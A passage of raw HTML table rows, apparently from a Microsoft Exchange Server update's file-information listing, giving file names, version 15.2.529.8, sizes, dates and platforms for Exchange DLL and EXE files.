/td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr
><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.529.8</td><td>321,400</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.529.8</td><td>18,000</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.529.8</td><td>45,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.529.8</td><td>21,072</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.529.8</td><td>415,096</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.529.8</td><td>1,269,840</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.529.8</td><td>39,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.529.8</td><td>433,232</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.529.8</td><td>4,563,320</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.529.8</td><td>261,192</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><
td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.529.8</td><td>94,080</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.529.8</td><td>586,104</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.529.8</td><td>3,537,488</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.529.8</td><td>67,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.529.8</td><td>16,485,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.529.8</td><td>58,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.529.8</td><td>23,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.529.8</td><td>101,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.529.8</td><td>543,608</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.529.8</td><td>305,016</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.529.8</td><td>273,992</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.529.8</td><td>418,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.529.8</td><td>275,832</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll
</td><td>15.2.529.8</td><td>70,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.529.8</td><td>7,873,104</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.529.8</td><td>1,501,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.529.8</td><td>71,544</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.529.8</td><td>1,238,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.529.8</td><td>1,877,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.529.8</td><td>5,366,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.529.8</td><td>36,216</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.529.8</td><td>117,624</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.529.8</td><td>207,952</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.529.8</td><td>79,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.529.8</td><td>17,272</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.529.8</td><td>156,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.529.8</td><td>65,912</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.
eventlog.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td>15.2.529.8</td><td>58,448</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.529.8</td><td>29,768</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.529.8</td><td>175,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.529.8</td><td>28,544</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.529.8</td><td>75,128</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.529.8</td><td>207,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.529.8</td><td>440,192</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.529.8</td><td>83,328</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.529.8</td><td>35,200</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.529.8</td><td>96,632</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.529.8</td><td>1,110,120</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.
2.529.8</td><td>14,720</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.529.8</td><td>135,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.529.8</td><td>5,065,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.529.8</td><td>20,048</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.529.8</td><td>68,480</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.529.8</td><td>5,086,080</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.529.8</td><td>265,592</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.529.8</td><td>37,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.529.8</td><td>549,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.529.8</td><td>106,368</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.529.8</td><td>291,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.529.8</td><td>277,888<
/td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.529.8</td><td>2,993,528</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.529.8</td><td>90,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.529.8</td><td>101,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.529.8</td><td>38,264</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.529.8</td><td>45,432</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.529.8</td><td>58,240</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.529.8</td><td>147,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.529.8</td><td>184,192</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.529.8</td><td>38,272</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.529.8</td><td>55,680</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.529.8</td><td>147,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Micr
osoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.529.8</td><td>191,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.529.8</td><td>28,032</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.529.8</td><td>42,880</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.529.8</td><td>264,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.529.8</td><td>264,568</td><td>01-Jan-2020</td><td>11:21</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.529.8</td><td>358,264</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.529.8</td><td>4,164,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.529.8</td><td>308,600</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.529.8</td><td>41,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.529.8</td><td>137,088</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.529.8</td><td>441,928</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.529.8</td><td>14,432</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.529.8</td><td>224,848</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.529.8</td><td>106,064</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.529.8</td><td>169,040</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.529.8</td><td>169,040</td><td>01-Jan-2020</td><td>11:19</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.529.8</td><td>259,664</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.529.8</td><td>72,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.529.8</td><td>215,928</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.529.8</td><td>425,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.529.8</td><td>70,528</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.529.8</td><td>46,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.529.8</td><td>215,936</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.529.8</td><td>168,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.529.8</td><td>343,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.529.8</td><td>174,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.529.8</td><td>95,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.529.8</td><td>127,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.529.8</td><td>63,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsof
t.exchange.relevance.data.dll</td><td>15.2.529.8</td><td>36,936</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.529.8</td><td>9,666,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.529.8</td><td>20,788,088</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.529.8</td><td>36,728</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.perm.dll</td><td>15.2.529.8</td><td>97,872</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.sassuggest.dll</td><td>15.2.529.8</td><td>28,536</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.upm.dll</td><td>15.2.529.8</td><td>72,264</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.client.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.routing.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.server.exe</td><td>15.2.529.8</td><td>59,472</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>15.2.529.8</td><td>1,647,200</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>15.2.529.8</td><td>207,232</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>15.2.529.8</td><td>60,512</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>15.2.529.8</td><td
>518,016</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.monitoring.dll</td><td>15.2.529.8</td><td>161,144</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>15.2.529.8</td><td>724,344</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>15.2.529.8</td><td>234,872</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>15.2.529.8</td><td>21,064</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>15.2.529.8</td><td>35,408</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpchttpmodules.dll</td><td>15.2.529.8</td><td>42,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>15.2.529.8</td><td>56,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.rules.common.dll</td><td>15.2.529.8</td><td>130,432</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>15.2.529.8</td><td>20,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.safehtml.dll</td><td>15.2.529.8</td><td>21,368</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.activities.dll</td><td>15.2.529.8</td><td>267,648</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.contacts.dll</td><td>15.2.529.8</td><td>110,968</td><t
d>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.core.dll</td><td>15.2.529.8</td><td>112,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.services.dll</td><td>15.2.529.8</td><td>622,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.dll</td><td>15.2.529.8</td><td>185,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.eventlog.dll</td><td>15.2.529.8</td><td>12,152</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.blingwrapper.dll</td><td>15.2.529.8</td><td>19,536</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.core.dll</td><td>15.2.529.8</td><td>212,040</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.ediscoveryquery.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.engine.dll</td><td>15.2.529.8</td><td>97,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.configuration.dll</td><td>15.2.529.8</td><td>16,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.dll</td><td>15.2.529.8</td><td>436,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.files.dll</td><td>15.2.529.8</td><td>274,304</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.flighting.dll</td><td>15.2.529.8</td><td>24,952</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.mdb.dll</td><td>15.2.529.8</td><td>217,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.service.exe</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.s
ecurity.applicationencryption.dll</td><td>15.2.529.8</td><td>221,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.529.8</td><td>1,558,632</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.529.8</td><td>28,544</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.529.8</td><td>225,376</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.529.8</td><td>5,150,288</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.529.8</td><td>214,912</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.529.8</td><td>115,576</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.529.8</td><td>83,024</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.529.8</td><td>80,760</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.529.8</td><td>81,488</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.529.8</td><td>212,040</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.529.8</td><td>1,340,800</td><td>01-Jan-2020</td><td>11:1
9</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.529.8</td><td>511,872</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.529.8</td><td>47,688</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.529.8</td><td>873,544</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.529.8</td><td>1,352,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><t